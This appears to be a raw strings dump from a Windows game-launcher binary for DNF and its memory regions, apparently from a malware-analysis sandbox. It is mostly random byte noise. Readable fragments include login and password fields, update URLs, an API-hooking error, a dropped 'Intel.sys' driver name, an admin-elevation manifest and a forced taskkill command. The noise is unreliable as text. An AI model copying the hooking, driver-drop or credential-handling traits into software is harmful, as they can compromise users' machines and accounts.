,9>%Fr1
M?;1.Bt
.Pak!
q.xC,
:7:{&.UTdDG
5Ni.aF
.fn%WhdK
b..SY
X|%%s
.mPobz
JP%s7
W:\(Q%
!-,%S
u.yb]
%f^V9N
MZ .XT7
I:.iy"
ro7.VPF
U.QJu
r.Mai>:9
9z.af
zn%3X
&.yb]
wU].QZ
1.rR4S
0?k.iw
i.fFI
ExitWindowsEx
5r.qa
.bfFa
*.me.
c{/&%fx
`B.vc
%um|T
v$%S_T
[,j"&.qX<PI
KERNEL32.dll
.ut`?w
Dw%ft
USER32.dll
7}7
6*7074787<7
< <$<(<,<0<4<8<
0S091K1h1
0 0$0(0,0
4I[o%x
ADVAPI32.dll
.YGFNY
Z-ÿ
ShellExecuteW
y.UP|
$R%Ug
J^o%S
~%C  =
/l.Yg
KDÔ
h4h%fSo
)f%sem5`
re.gg%
g.jTlYS6#g08
gg7%sAg
.JmgG]7g
igD%6ug
9.gx<|
.igZGqLR-
lt%SQ
u.Cg(z
nsUDP
ro.Oo
MSgge
sa-X}5
{7À=&s
.va\VB
2.lG<
.gyy*
ys.gi
}.agn
eX.eA7e
,0%FRS.
.go0;
Lkg@3O.gx!
7.eX/
)%S$g
c-WU.ix
!`@.ne~
P~udP)5
%umOG~
mL%X.
i.HgX
bmSg
4W.bgq
.Ebt8
vO%U7
.ve.B
%X-cV
.ZgU]
.bVoj
%x=CZk
]@.AV
%UYCg LJp
G.frg
.Cn#{%F
.gZ-?8O
.Zgz"G
M.lgj
b%UETg4
a.YQX
.gi&h_
p;.Id
o?D'.vSj
%DK|g0;
.PDg=
0o%xb~Og
iOv.gi
/gD
.oUKd
Bxb%Upl
.Tg!S
Rd.o~"f%S@n
).nE8L^
.Bb^g
<.gTc
Ú4Vjsg
P.gga
ef.eUDex
iN~.fX
} Q%s
.gNG7Kg
'WeB#VQd
".bGQ
h.cg`n\
.gYi\
.hz?h$
.TKC3
.zG{y
'.RT?
.nXVi*Tc
.nu>G
g%u3P
8<%C?gL
Zg[%X
_H.ZXB
.iyG[
7M5{ %s
ki|PUQ)%c
g.lX-
f%x@G
Jg.Bu
V.M2%F
5%dS0
W}%DK
.ALBK
l^X%XS
.oUl)g4
%d.@m
#`.gy
2}O.cQo
ggH%U
oj.TLX
Y.Zmzg
:~Z.gHa
Od.Ug
Wgýb
"#.Ga
EtCpG
:i.ge
\SkQouBKq}5.yj
J~XW.Io
.mg-g
.gvoV
'-x}g&K>
.ggq%
.gg?Y
u%Uej
QFÔ
<g~.PS
e.YLI
tK.ck
Uo%cl
y;%DZ
`%U)*xZce
ig.hg
-.gh8
Dg.gUu
}.CU7
.JggYs&
-'.Tk
.fgX*
%xg;i
.gYcC
.gh%@
5<%4xo
os.eN{
YP3-i}D
g_w%4so
ng%S?g7
Og.cgHO~hgx
1ig3Y&]%c
.uzeg
.gA7}F
^:j%S(ggb
<:jg%#msg
uRlg#&
gXCS%f
J.gPW=g
Mzdg`%x
.HAg|
Kg_(p.gge
*3.gxPo
.gch^."
.gEgo_
 .Dgv
ggf.NAV
jg$u`.dgC
.Aog$
W0.gg[;
q.Gg[
fQZ.gF
.gtc*=
.grCL8
i.Vgg
.gH))g
7C%dH
gt g#.hg
.rHgsy6
'.gSf
05.Bpg
.gKg'
ny.Ias
.ggQs
.gQ7-
.Yzeg
Jg5%uQ
gT.gw
ogf%sV
Ri%DZ7
.gGgi
gH.Weg
H.Ej9'E
?gn%X
;g*.ag
)D.gq
%S0Fin
;g.jL
!S.gn
g0V.gl
.gY @
:.ct -y
9g,|MV.gvG
.gH7o;
%SWgg
<.Wcg(
.gwX-R
gdg.gG
@uH.bgg
g%f Z
|9gV.gO
.gRd'J
.gTt;gH
gbe{%D
\(.gC
i.gJO
gd.ha
5-tC}_kgE
Qig%SvzEg
}V%X7
Wog9.ze
~Igbg%C
NW.gt
.gygvR
.gkgu,5
x.gJpz(g
g@Qng%c
?.eg8`'G=
.gk~gg=z_
(-.gg
gg8%s
 g[.gne
.gzCp
5h.ggc
-'.gV
'a9.xtE
.AY=g
T.Og)
WR.Mg<[
JFWgg*B.rH
j.ghgQ
1/.nD
.gPu?
JyW.gt
.xV$g
W.gf#
-7J}g
.ug!;
g2.gT
1]`g.wc
.Doz$S
.ugg\
.igTg
.ggU\
.DJVP
gE{%DI
.geh5
].Fj'
7%xgg
.egD7w
gV.agX
dgg%D
gE}.hb@
,g".gCf
lgx.Img
a%Xg6p^
msg-4c
`g.Cu
.Ycg'
:.gYK-y
.gRo3
-SF}g
.VLljd
F.HZbgn
%SDgH.Qv
L.gq<_l
yt=%%X|
.zog2
=g{%d
!g.ha Q
kc%D^M
g%d`@n
W.ocgm
\.wta
k.ggf
gv.oM
.cbVP
.zggt
%C/_o-a
gg.ov
Lg.cgw9g?
~.gEa
c.%cl
bge%D$=
;g.beg
%dg2c
cg.Io6
'ci%c
c2%c\ c
HH.igQ?
Ê>T
E/e.uu="/g
/7%U7
o.To8
o%Fo? o
.iGD>P#Tt
-i=%U[ga
g%Dz5
%s'Wn
/.zTCy
o.HODge$
Fh.cE
cf~c!%c
g!H#%f$g
H.egy
.gg#7]
%cWzg
61eJ.Lb
-g.NV
2e.ye
g%s1q-
.aMa}
yv%sJ
og7.tT
w.acgm%
?kg%x
cg c.gH
G.aG"
Je.sB
7*C70]7%u7x@7
oE.oG
P.Bya
f8.Sp
.Bz *u
.DVY|qg
FÝg
8T.gd
'n%COkL)
GgkfY.gg
xagZ.gg
gcC.%u
,.goI}WO
msGVT
6[gg%fiZ
.ByYI
F~-.gg
%DYkg
.gHgA8
Zkg%UL~Lg
2.kg^b
-qW.gF
r.gud
fg .Ap
g.WMg
Msgc
su1.QxgGA
}.ocw2
gB.gH
VN.xc
79g.QE
D.kNJ
,BQk.Cj=g
.wDl^m-v
g-BJ}
g4NHý
GgA%uo-K
'.nUl
Gg.QKg gc
FMJ%c
g.cE93
J.gPk@
.FkgL
1Mo.OA
Xg(J.jh
mSgBI
%5.gH
%CngR
!.Xoz
T.gnL
.jgmL
þgg
FTP7z
ah}
g_.Ad
<LY.gUc
GI<%U'@w'uf'
\-gH}
.nOiigb8~
1S.cg
~H.gP:v
%.nTg
'.Qg5
.Tg&-/
6%XdD_ec
%sFgV
@E.gh
x.gw$G
-o}'B
oekm&.cg
N%f.Q7
5g%cH
d>V:MSgD
K.gj[
%X-cg
.Jvm*g
co.bn
%u9kgK
:g%X])
.zFC_
Ce%d"
.QOAx
5*%CX!
z.aI?g
<4H
.TX4:g
7.NSs
%U,Ho
gO9.zN
[g.Ny
gk.rqj
gO.aov~
G.Wok
5]4gj.Vs
~Y.Afg
2.Gp=
gTcp5
_.FgOl
.igyL;
U:\X>g&
.nGole;
-}%X$Kgh
g.HkwNQ
\}7%S
 O.vD1
g2M%u
%DQ\gI
kEy*WVBj
s^.LS4
4K?q.gM[3
/x%Ug
c.kD[
Z2.Kg
7.YTv3I4i
u.nB'4
g]i.Cy
S%XgUB
O|%sV
P~D.OAg
_]%UE
q.uxI
gdUCmDu
.GwB/
%xgzr
.eE$Z
.kpXg
1.fg$
.kgnb{
%c?;`h0
#.OgW
%].NX
M;<#
.YewhU
/>g%u
,g.cn
%S[0g
(/%c_
%dN`/
".xm6
=E.nU
i.gaq|
.Po>'
-g8}j
%U{(j
NeK^7k.gf
sg.eC
.Dc>e
.oSL4
.oQNX
m!&XxK9bo.Ha
5.gk?7f
Iz(%C
X.Og|
.qa%G
CgFq.crg
g.YF1
)_.vt
".NYg^t
dU%xk
.ke]yg|
`~.GLc
3I-g}7{
Y.nyg
8_`g%R\.IB
g.sC86*
.gU x
/.ypWg
%c) S
tQ.lg
[]og1%f
.gn_YP
>n3%c
3=.sW
gq.lb)y
&<.gG!
p/g.og
B c.xgJ
*.XpO~g
-.ega
.gi13E
gm%X@
]d.PW
.HZlz
$1E%c
WgcBx%Ug
kq.gr
0.ox1
(I5n%x
.iAg=
@%k-LU}g6
&g.vol
c.Lkf
4u6.Li
_m%4so
d#goZB%xv
?.sa5
.gLGU
lkz%.Gg
.ggI@!
`hxXrcLÊ
cofgt%sl
tc.go
.ek6E(
#XIc\.cE
4g$.gb7
$gh$h.KH
zgX%SGk
`g.ZBg
X4g.Bkmn
g%cg/
.nX^|
.mg>^tO
zú(g
78Tn.gM
V@.Lg
%X$mgM
hq1g.rVz
.TEgg
g.endb
.ggj<
J.gnX
[>o.YN
q.iH]W7g
NICkw
fgQ"%X
ho.eo
.ohg#
^Em%U
Tcpe
]zkURL
pog%C
Yogr\#8.gg
ERg%u
u_.gTG
Rnw.gc
<g.Oq@
:.gMwN
'lY%0xk
igIÎ
.uDgw(
gzgg.fc
,^kg%xfG
%sTg7X3
yKEYog
.Y%cY
.gg!8`H
qjgm%u
n{.gc
V/.ob
g1"/%D
y%UH'L_
kg.Sg
.gg4ZN
.gceu
`g.pT
.TJng8'
%f/B{
#.Lj*
<.nEg
G.Et-b7aJ
vK.gkJ
YgA2.Vk
P6-c}E\
%u`K@
g]L".ei
9Qu%D
.gdp$
ßgx
@<-I}g
ge%u 
4.Ea<g
GMsg
R7.SZO
Cmsg
.gg%q
,/.ng7
Ÿkgt5
v.jkRI
`g .vK
.Slyl
.yx&c'
n%X/C
=X5.fb
iHv%xgn
(D%Xgg
L_5%d`gg
8\.xOn
6(-X}
.ga7T_ cp
%cV!g
?%uDzeOg
v>g%s
gEg%S7WV7
lI%U47_
7G^2.vfge
^_mP.Xu
B.Ic^g
S<.Bg
Y6Ç
#d_ Xw.Teo
e.zY=
m =|i
%Dw25
.igCw
"gN.zC
W.ggG
cS%XJ
!.rkn
tgce%F
=%6S 8
\? .Zg
.rR)H
=.gjX
".gvK
eD.gnE
c.Ky5
=j.rn
 .Wg(
)CbM%f=ggL}T
.cTpG
:g%cw
Kg.Ew\
5e%Si7!ng
6f#&eT%X
-i}Q>g
~lg\.Uom
N7.Vyib
)%x*q
-nrgi}:*#
@g}.pZI
y.Plags,
'.gWl
zkeY`g
"#Uba,kW.vB
R.sgV
MP[Ê
t%Dg<
7`Qf.oE)r
qkK%cGgp
>$.ogC
S/.Og
%Cnkg
,.tgD
t=Ik
".ReZ
!gJ.ja=g
%UQDN
IS.org
nr-gK}
g.dXU_
gI%u@
?M.Fgg%
>.To_
XN%f`g
i.KJ\
g9[%C;
.gT^Y
P.gbB
hgg%S
g,.qn
b%%.Lgg
B|o.og
@`gg`.UjW
j$g.tx3
ÓEg
'g.no
O%d|ci
uu.ec
X%ug@/'
v.nV#]
%tCPa
Hgc%D
.gngg
v.yglw
H:I.igog
kgF%f
=s%uP
dc?.AHRmg
bge%x
%Sg9%
K ú
a[%C=3
.QJg M
.gO}q
Oh%Su
8@.sk
aZ.Vb
.ob=H
g\.HK:k
qQ.INAFq.
Af.jr(F!sz
C@.iq6
&.qX<"
"}.un=
SHELL32.dll
"7user32.dll
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
mscoree.dll
KERNEL32.DLL
WUSER32.DLL
E%sIntel.sys
%sIntel.exe
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:

%original file name%.exe_2956_rwx_01380000_00504000:

zr_]UbN
.xV``
.YB}n=
.uBs{(JBq
&.uFi
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
activation.php?code=
deactivation.php?hash=
y2.eu:
.?AVIUrlBuilderSource@@
c:\%original file name%.exe
` Bb]%X
.Ujb!7l$_s
.jbBA
uDp'\T?UT6
^U.Qf
/.XZViC
"%1zqQ.Rog$
YQ.EM6
$[.zZ9)~M
-%fT\;Q
L.rg-
%F/.0
(nF%sr5-
Y<ÚK
.ToDLCF
Q.EMN
-r.arz%l\
".qZE=
_DsSH[Tq
M:.yjJu|h# 
\TCpAIN
v.uYQ2Ls
VeRr%3x 
.utDd'3|
m&y.Wh{(
7h}%f
".qPd
.Wh2N
xX_C~^%xtC
Ni%f*
.uJjQ?p8_
.so$:evV=
&.yxHh7
xOKCXQai.EMf
MfY2M2.af
Ee.cS[4'
r.uYQ>
$kdDw#hp .hJ
5va.Ire&YF
).yb-~
5NCsSH
-b}u6
&.YqLl 
]:.aq2
".yU~F
6 ]em.Poh
kc(>m&.UT
n.yU]"
.ek4'/`x
.YJIZ-
.qbj)
c.zrA
V^%dT\C
!~Q.IreFg(
0OZjb=
(c.zrE
>U!-b}6u
(oe2.yTp?
}.yb-{
^.px3
<c.zZa2:e
_@.qe
'gi.de
z-b}u
Mf:m%fz%
i.EMV
e.EeF
wPAE%uz
V^Ð
HkXPCNZ5&.UTdl
n%Ux 
Jm%f| 
8"th/%fn
&.yxH@_3Lck<3l
C8 s)z.yi6"e
`em.DE'
X !j~_:
J%Dpx
L^.px
.MEnc7?|
.AVme&k?
via:.yoD
 dt#4<[.zrA
.Yn_W0
4[.zr
-BP2}6
V^Ð8O>2
.zZE< w
0/'l=ia.Ee*`
.yFf=`?
M2.aL@W
%fOk,WX
-Mm}u
)r-%f
Rr_]Ufk?
]2.qa"
.yb1bA
uQ.IBUB]V
`a%fh3_-
%7U}u2
QY.Ee6
|?p{(M:.eb
".qPL3l
/.XT?
W8.anNa
dUI6i.aB
-2}JjE-^qQZ
n^V-%fp,
rs/.yM
.meF$
{.IY(ssp
.iw(W_0;3PCL
f!V^%dT\W
ck4g(s0U.aF
)gQ^TcPp f2:Q
}.yb-V=
&.iw(v
%fyq&Y
9RM6a.Ify
.iPdC
.zr-ZR]
.YBYbU
&.im%
Kd_Lq.OTo$
}.un1z=
.ie_Z
&.YDHoWa
m&.wJ
.XT7?P
%FY:s
}.qy&4gZ
vj=w
P<.leTI_-
C".qPd7
S@.iq
&e.EM>s'
.eixn
~„c_
u.ybY
bZ5Oy&b%dH{m
e.anf9x,$
UT".iRAL
kGp/.XT[ 
h`7r&.ir
j$=z.ue:
.iPdO
.iNEj)
V^%dT\ @`G
S-j}]2wGg,
CZ.pPS/
Z5%fH
.iD`W
.evV=
.TS\E
uAz.qbjU
(m4.TA
".ab9)f
.uFukjg
071=^6<7<
QT".qe
nfÐ
FfÐ
2.eA{'nS
=r.iPdC
.Yj)R5
cU.Ee
5z.qa
%DL;gZ
e2.qa"
7l?h[Hm.aN
c'TCpx
NJ= \Ÿ
kKpy-%f
}Y.aR
&.iw<
&.uJjA
%fqQf<s/
kV|9.tPG
Wd<o%ft'
Q:d~ykc@.YfFU}
pP7r&.iq
sSHW<
S[0y-%f[GD
/\-yY.de
"U].UdDG
%F}uB
-ytu}
'|sSHr%
9b".aJIZE~
d.NeRr9
aEr.uc4
H^.px
^5-j}
"U.bQ
}V^%dTtC
.Tp';
>6UbSsH
V-&.irz-"u
.IqC~
.ab9p@H?."}
-G.RU
}.ybM
BJU\lLC".qy*
}.qy&4gNjE
g~v%dT
.qD`/?
q.uTK
U:v.Mai
i2.eu>
!;m.GKR
h.jls
.hsPb3
.hsPf5a
.hC:f
_qf%xrb
|e.eZ*
Js%sX
.odTa
.HA; 
`h%fp
.oVSa
d1.Zf.
nB.MCU
.UC\&
&.Zf*L
|e.uE
%SqM:2
.VRKHV=
V|"'mOusSh
4 `h%fp
|^.dd
.Nn59
{.UFt
-l%d)
.IC\&
.zq)y6
B;3%x
bBE.rcD
.FM\m
.g(%d,dc
s9G.lB,
uudPC
Kqñ*
>-%x(
.gJw/
\.vN%
.YRKBf
H%U|[
H%Us[
).JS3
'%X~&
/.DTa
8U.VBF
z31 e.VB
L.za=
.Aye?$
.DFIM
}-Sh}m
JFtp
$]%D#X
|e.VR
!C.YB
dR.XE
I!K.bB
JP%d,
Q%c:x
;lz%u
vrý
trK%U
ryf=.wKH?
s-E}.
nd.va
5<.tj
Q/}
.U%D$9
.Zl@ h;
BZ.ti
DD.ZZ
pj.YK&
 *%sVO6
J.Bx=
`%s},
.GDZe
.Bg=I
3@F%x
F.uljH
w.LXVL
oC%d@
).cuP
3.vUu
>Z.Dq
.MDRw
{?a%u_
K\X.emh
2^:_56!5
%X#X2Vy8h
yFTP
/.Lec
wW%sw8;x$
.lcHp
X\%dZ
t%fnL
dessH
(1.Wl:
`.pLv
}gq%Xp
h\1(.zU
I`.PkG
%X@X!(j
%u6mO.
H\.kH@
TH 9EXe
.MvV`
UXY.uE
.ly1z
%c!OA
JExE
.GXoj
Dg.pL
x_.Xw
.Cxs#
c4.XC
.UE%3
H.Ib*OE
s.Qa4KG
*0%UtR
d\).zO
@%fpL1
F24
.SLOL
%Sk%6
%4.d{
Cz:%C
*M.QS~
%Fu^gw
%XSP}
>ge.DM
x*O2%U
-3}xH
u7H%S
c%x0.
~d.hz
RL
G,Y%U
M.hzc
.CL",
.Any1V
bB$,F
.DBE:
%u@-N
fJi.FH
.Hy6e
8Tt%u)
.MU_(
[{%fH#d
r4)%UG
.lD?g3w
#(.HS
tweb
.mQH5
.yi,Q
U%c*P
Z/.kY]
wBZ.cw
K%U=-
.BU{,i
a=%do5
Wpmsg
(.une`
H%U-=
wBZ.cs
6J<.GWy
wBZ.wJ
.UMTa
UgO.eQ
%Dk*qH
1%XWw
99.%F
.uk@B
AjT%s
5>%F"2
ftPy
=X-Q}
eG.uN
.QU=~
W`~%xx
ÞJ6
4n!.kT "
T%S0F?V
pI%SmJ*^
%Ubq%
X%Djy[
=.ptS
#&.ns
.XMTa
.Nr_d
o.PVX
,p3%x
d%s15(
.zVZ?
G.dV'
QweB0
d=cüi
g|%Cv
=.aG)c
iSTZ%u
8 IK3%d
#%fW[iG
T{%S8
M:.hP
W$.wI/i
AA.pV
jZ.znI
%D-m=
Zg-A}
}*r%d/
.>t%f(
d.ck3p
.Ej#6`
nob.wX`#j
%a.dp
.qI-K
? .RMTaG
"Tdb.wY
.RMTa/{U
hSZ.eG
5"C
5-w6}
,9>%Fr1
M?;1.Bt
.Pak!
q.xC,
:7:{&.UTdDG
5Ni.aF
.fn%WhdK
b..SY
X|%%s
.mPobz
JP%s7
W:\(Q%
!-,%S
u.yb]
%f^V9N
MZ .XT7
I:.iy"
ro7.VPF
U.QJu
r.Mai>:9
9z.af
zn%3X
&.yb]
wU].QZ
1.rR4S
KERNEL32.DLL
mscoree.dll
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:

Reality.log_1796:

.text
`.sedata
h.idata
H.sedata
.fIygf
sMsgType
sKey
lpMsgBuf
pWebBrowser
strKeyName
%UUUU
kCv.SCv?lCvg
ux
//./%s
X-X-X-X-X-X
00-00-00-00-00-00
TaskKill.exe
/F /IM DNF.exe
x -
%s x
20161029
skin\LoginGame\
res.xml
LoginGame.zip
LoginGame
edit.edit.account
edit.edit.oldpassword
edit.edit.newpassword
edit.edit.qq
edit.reg.account
edit.reg.password1
edit.reg.password2
edit.reg.qq
checkbox.login.save
edit.login.account
edit.login.password
button.login.enter
button.regaccount
button.cdk
button.editpwd
text.title
text.notice
.\Config.ini
Password
tabctrl.controls
text.load
text.check
text.login
text.build
\DNF.exe
\Script.pvf
%d.%d.%d.%d
update.exe
\update.exe
dnf.exe
DlgMain.xml
button.reg.cancel
button.reg.enter
button.edit.cancel
button.edit.enter
edit.cdk.account
button.cdk.cancel
button.cdk.query
button.cdk.enter
button.mainhome
button.down
button.paycheck
DNF.EXE
progress.update
DOF.zip
Script.PVF
PVF.zip
.\DNF.exe
combo.cdk.role
edit.cdk.code
msgwnd
message.type
DlgMssage.xml
MsgWnd
%s(%s)
%s(X)
pvf_url
exe_url
mainhome_url
download_url
paycheck_url
login_ver
DNF_LoginGame
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
-1.1.3
1.1.3
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
dest='%d,%d,%d,%d'
keyboard
XML Error: %s
msimg32.dll
EXCEPTION: %s(%d)
Core\UIManager.cpp
User32.dll
windowsize
CWebBrowserUI
CHotKeyUI
password
passwordchar
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
Riched20.dll
M-d-d
WebBrowserUI
WebBrowser
{D27CDB6E-AE6D-11CF-96B8-444553540000}
ListTextExElement
ListTextExElementUI
HotKeyClass
msctls_hotkey32
HotKeyUI
HotKey
fade='%d'
o@Shcore.dll
Shcore.dll
unsupported bit depth
unsupported format
unsupported data layout
monochrome
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
?#%X.y
RegOpenKeyExW
RegCloseKey
GetProcessWindowStation
operator
LoginGame.exe
??0CHotKeyUI@DuiLib@@QAE@ABV01@@Z
??0CHotKeyUI@DuiLib@@QAE@XZ
??0CHotKeyWnd@DuiLib@@QAE@ABV01@@Z
??0CHotKeyWnd@DuiLib@@QAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@ABV01@@Z
??0CWebBrowserUI@DuiLib@@QAE@XZ
??1CHotKeyUI@DuiLib@@UAE@XZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??4CHotKeyUI@DuiLib@@QAEAAV01@ABV01@@Z
??4CHotKeyWnd@DuiLib@@QAEAAV01@ABV01@@Z
??4CWebBrowserUI@DuiLib@@QAEAAV01@ABV01@@Z
??_7CHotKeyUI@DuiLib@@6B@
??_7CHotKeyWnd@DuiLib@@6B@
??_7CWebBrowserUI@DuiLib@@6BCControlUI@1@@
??_7CWebBrowserUI@DuiLib@@6BIDispatch@@@
??_7CWebBrowserUI@DuiLib@@6BIDocHostUIHandler@@@
??_7CWebBrowserUI@DuiLib@@6BIMessageFilterUI@1@@
??_7CWebBrowserUI@DuiLib@@6BIOleCommandTarget@@@
??_7CWebBrowserUI@DuiLib@@6BIServiceProvider@@@
??_7CWebBrowserUI@DuiLib@@6BITranslateAccelerator@1@@
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?AddSuportedFormat@CIDropTarget@DuiLib@@QAEXAAUtagFORMATETC@@@Z
?BeforeNavigate2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@1111AAPAF@Z
?CalPos@CHotKeyWnd@DuiLib@@QAE?AUtagRECT@@XZ
?CommandStateChange@CWebBrowserUI@DuiLib@@IAEXJF@Z
?CreateControl@CHotKeyUI@DuiLib@@SAPAVCControlUI@2@XZ
?CreateControl@CWebBrowserUI@DuiLib@@SAPAVCControlUI@2@XZ
?DUI__TraceMsg@DuiLib@@YAPBDI@Z
?DoCreateControl@CWebBrowserUI@DuiLib@@UAE_NXZ
?DoEvent@CHotKeyUI@DuiLib@@UAEXAAUtagTEventUI@2@@Z
?DocumentComplete@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@@Z
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?EstimateSize@CHotKeyUI@DuiLib@@UAE?AUtagSIZE@@U3@@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?FindId@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_W@Z
?GetAutoURLDetect@CRichEditUI@DuiLib@@QBE_NXZ
?GetClass@CHotKeyUI@DuiLib@@UBEPBDXZ
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
?GetControlFlags@CHotKeyUI@DuiLib@@UBEIXZ
?GetDisabledImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetExternal@CWebBrowserUI@DuiLib@@UAGJPAPAUIDispatch@@@Z
?GetFocusedImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetHomePage@CWebBrowserUI@DuiLib@@QAEPBDXZ
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?GetHotImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetHotKey@CHotKeyUI@DuiLib@@QBEKXZ
?GetHotKey@CHotKeyUI@DuiLib@@QBEXAAG0@Z
?GetHotKey@CHotKeyWnd@DuiLib@@QBEKXZ
?GetHotKey@CHotKeyWnd@DuiLib@@QBEXAAG0@Z
?GetHotKeyName@CHotKeyWnd@DuiLib@@QAE?AVCDuiString@2@XZ
?GetHtmlWindow@CWebBrowserUI@DuiLib@@QAEPAUIDispatch@@XZ
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetInterface@CHotKeyUI@DuiLib@@UAEPAXPBD@Z
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetKeyName@CHotKeyWnd@DuiLib@@QAE?AVCDuiString@2@IH@Z
?GetMessageMap@CNotifyPump@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?GetNativeBkColor@CHotKeyUI@DuiLib@@QBEKXZ
?GetNormalImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?GetPasswordChar@CEditUI@DuiLib@@QBEDXZ
?GetProperty@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_WPAUtagVARIANT@@@Z
?GetSuperClassName@CHotKeyWnd@DuiLib@@UBEPBDXZ
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?GetWebBrowser2@CWebBrowserUI@DuiLib@@QAEPAUIWebBrowser2@@XZ
?GetWindowClassName@CHotKeyWnd@DuiLib@@UBEPBDXZ
?GetWindowStyls@CEditUI@DuiLib@@QBEHXZ
?GoBack@CWebBrowserUI@DuiLib@@QAEXXZ
?GoForward@CWebBrowserUI@DuiLib@@QAEXXZ
?HandleMessage@CHotKeyWnd@DuiLib@@UAEJIIJ@Z
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?Init@CHotKeyWnd@DuiLib@@QAEXPAVCHotKeyUI@2@@Z
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?InvokeMethod@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_WPAUtagVARIANT@@2H@Z
?IsAutoNavigation@CWebBrowserUI@DuiLib@@QAE_NXZ
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?IsPasswordMode@CEditUI@DuiLib@@QBE_NXZ
?IsShowHtml@CComboUI@DuiLib@@QAE_NXZ
?IsShowHtml@CLabelUI@DuiLib@@QAE_NXZ
?IsShowHtml@CListContainerHeaderItemUI@DuiLib@@QAEHXZ
?IsShowHtml@CListHeaderItemUI@DuiLib@@QAE_NXZ
?IsShowShadow@CShadowUI@DuiLib@@QBE_NXZ
?IsShowText@CProgressUI@DuiLib@@QAE_NXZ
?IsShowUpdateRect@CPaintManagerUI@DuiLib@@QBE_NXZ
?Join@CDuiRect@DuiLib@@QAEXABUtagRECT@@@Z
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?NavigateComplete2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@@Z
?NavigateError@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@11AAPAF@Z
?NavigateHomePage@CWebBrowserUI@DuiLib@@QAEXXZ
?NavigateUrl@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?NewWindow3@CWebBrowserUI@DuiLib@@IAEXPAPAUIDispatch@@AAPAFKPA_W2@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnEditChanged@CHotKeyWnd@DuiLib@@QAEJIIJAAH@Z
?OnFinalMessage@CHotKeyWnd@DuiLib@@UAEXPAUHWND__@@@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?OnKillFocus@CHotKeyWnd@DuiLib@@QAEJIIJAAH@Z
?PaintStatusImage@CHotKeyUI@DuiLib@@UAEXPAUHDC__@@@Z
?PaintText@CHotKeyUI@DuiLib@@UAEXPAUHDC__@@@Z
?ProgressChange@CWebBrowserUI@DuiLib@@IAEXJJ@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?Refresh2@CWebBrowserUI@DuiLib@@QAEXH@Z
?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ
?RegisterEventHandler@CWebBrowserUI@DuiLib@@IAEJH@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?ReleaseControl@CWebBrowserUI@DuiLib@@MAEXXZ
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?ResponseDefaultKeyEvent@WindowImplBase@DuiLib@@MAEJI@Z
?SetAttribute@CHotKeyUI@DuiLib@@UAEXPBD0@Z
